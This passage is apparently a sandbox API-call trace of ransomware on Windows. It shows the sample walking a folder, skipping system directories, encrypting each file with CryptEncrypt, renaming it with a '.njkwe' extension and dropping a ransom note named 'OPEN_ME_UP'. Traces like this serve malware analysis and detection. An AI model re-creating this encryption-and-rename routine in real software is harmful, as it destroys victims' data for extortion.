ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.460] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.460] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.460] GetProcessHeap () returned 0xbe0000 [0060.460] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.460] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.460] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.461] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.461] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.461] CloseHandle (hObject=0x42c) returned 1 [0060.511] GetProcessHeap () returned 0xbe0000 [0060.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.511] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll_r00t_{3sXlE5}.njkwe") returned 64 [0060.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll_r00t_{3sxle5}.njkwe")) returned 1 [0060.511] GetProcessHeap () returned 0xbe0000 [0060.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.511] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0060.511] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="Windows") returned -1 [0060.511] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="$Recycle.bin") returned 1 [0060.511] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="System Volume Information") returned -1 [0060.511] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="Program Files") returned -1 [0060.511] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="Program Files (x86)") returned -1 [0060.512] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 48 [0060.512] StrStrIW (lpFirst="GetCurrentRollback.ini", lpSrch=".njkwe") returned 0x0 [0060.512] lstrcmpW (lpString1="GetCurrentRollback.ini", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.512] lstrcmpW (lpString1="GetCurrentRollback.ini", lpString2="taridd") returned -1 [0060.512] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.512] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.513] GetTickCount () returned 0x114f8f7 [0060.513] GetTickCount () returned 0x114f8f7 [0060.513] GetTickCount () returned 0x114f8f7 [0060.513] GetTickCount () returned 0x114f8f7 [0060.513] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.513] GetProcessHeap () returned 0xbe0000 [0060.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.513] ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x9c, lpOverlapped=0x0) returned 1 [0060.514] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffff64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.514] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x9c, lpOverlapped=0x0) returned 1 [0060.514] GetProcessHeap () returned 0xbe0000 [0060.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.515] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.515] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.515] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.515] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.516] CloseHandle (hObject=0x42c) returned 1 [0060.516] GetProcessHeap () returned 0xbe0000 [0060.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.516] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini_r00t_{3sXlE5}.njkwe") returned 68 [0060.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini_r00t_{3sxle5}.njkwe")) returned 1 [0060.518] GetProcessHeap () returned 0xbe0000 [0060.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.518] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0060.518] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="Windows") returned -1 [0060.518] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="$Recycle.bin") returned 1 [0060.518] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="System Volume Information") returned -1 [0060.518] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="Program Files") returned -1 [0060.518] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="Program Files (x86)") returned -1 [0060.518] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 50 [0060.518] StrStrIW (lpFirst="PartnerSetupComplete.cmd", lpSrch=".njkwe") returned 0x0 [0060.518] lstrcmpW (lpString1="PartnerSetupComplete.cmd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.518] lstrcmpW (lpString1="PartnerSetupComplete.cmd", lpString2="taridd") returned -1 [0060.518] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.518] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.519] GetTickCount () returned 0x114f907 [0060.519] GetTickCount () returned 0x114f907 [0060.519] GetTickCount () returned 0x114f907 [0060.519] GetTickCount () returned 0x114f907 [0060.519] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.519] GetProcessHeap () returned 0xbe0000 [0060.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.519] ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x241, lpOverlapped=0x0) returned 1 [0060.520] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffdbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.520] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x241, lpOverlapped=0x0) returned 1 [0060.520] GetProcessHeap () returned 0xbe0000 [0060.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.521] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.521] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.521] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.521] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.521] CloseHandle (hObject=0x42c) returned 1 [0060.522] GetProcessHeap () returned 0xbe0000 [0060.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.522] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd_r00t_{3sXlE5}.njkwe") returned 70 [0060.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd_r00t_{3sxle5}.njkwe")) returned 1 [0060.522] GetProcessHeap () returned 0xbe0000 [0060.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.522] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0060.522] lstrcmpiW (lpString1="preoobe.cmd", lpString2="Windows") returned -1 [0060.522] lstrcmpiW (lpString1="preoobe.cmd", lpString2="$Recycle.bin") returned 1 [0060.522] lstrcmpiW (lpString1="preoobe.cmd", lpString2="System Volume Information") returned -1 [0060.522] lstrcmpiW (lpString1="preoobe.cmd", lpString2="Program Files") returned -1 [0060.522] lstrcmpiW (lpString1="preoobe.cmd", lpString2="Program Files (x86)") returned -1 [0060.522] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 37 [0060.523] StrStrIW (lpFirst="preoobe.cmd", lpSrch=".njkwe") returned 0x0 [0060.523] lstrcmpW (lpString1="preoobe.cmd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.523] lstrcmpW (lpString1="preoobe.cmd", lpString2="taridd") returned -1 [0060.523] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.523] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.523] GetTickCount () returned 0x114f907 [0060.523] GetTickCount () returned 0x114f907 [0060.523] GetTickCount () returned 0x114f907 [0060.523] GetTickCount () returned 0x114f907 [0060.523] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.524] GetProcessHeap () returned 0xbe0000 [0060.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.524] ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x4a, lpOverlapped=0x0) returned 1 [0060.525] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffffb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.525] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x4a, lpOverlapped=0x0) returned 1 [0060.525] GetProcessHeap () returned 0xbe0000 [0060.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.525] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.525] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.526] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.526] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.526] CloseHandle (hObject=0x42c) returned 1 [0060.527] GetProcessHeap () returned 0xbe0000 [0060.527] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.527] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd_r00t_{3sXlE5}.njkwe") returned 57 [0060.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd_r00t_{3sxle5}.njkwe")) returned 1 [0060.527] GetProcessHeap () returned 0xbe0000 [0060.527] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.527] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0060.527] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="Windows") returned -1 [0060.527] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="$Recycle.bin") returned 1 [0060.527] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="System Volume Information") returned -1 [0060.527] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="Program Files") returned 1 [0060.527] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="Program Files (x86)") returned 1 [0060.527] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 43 [0060.527] StrStrIW (lpFirst="SetupComplete.cmd", lpSrch=".njkwe") returned 0x0 [0060.527] lstrcmpW (lpString1="SetupComplete.cmd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.527] lstrcmpW (lpString1="SetupComplete.cmd", lpString2="taridd") returned -1 [0060.528] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.528] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.528] GetTickCount () returned 0x114f907 [0060.528] GetTickCount () returned 0x114f907 [0060.528] GetTickCount () returned 0x114f907 [0060.528] GetTickCount () returned 0x114f907 [0060.528] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.528] GetProcessHeap () returned 0xbe0000 [0060.528] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.528] ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x133, lpOverlapped=0x0) returned 1 [0060.529] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffecd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.529] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x133, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x133, lpOverlapped=0x0) returned 1 [0060.530] GetProcessHeap () returned 0xbe0000 [0060.530] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.530] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.530] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.530] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.530] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.530] CloseHandle (hObject=0x42c) returned 1 [0060.531] GetProcessHeap () returned 0xbe0000 [0060.531] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.531] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd_r00t_{3sXlE5}.njkwe") returned 63 [0060.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd_r00t_{3sxle5}.njkwe")) returned 1 [0060.532] GetProcessHeap () returned 0xbe0000 [0060.532] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.532] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0060.532] FindClose (in: hFindFile=0xc1a260 | out: hFindFile=0xc1a260) returned 1 [0060.532] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 57 [0060.532] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\$getcurrent\\safeos\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.532] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.533] CloseHandle (hObject=0x428) returned 1 [0060.533] GetProcessHeap () returned 0xbe0000 [0060.533] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.533] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, 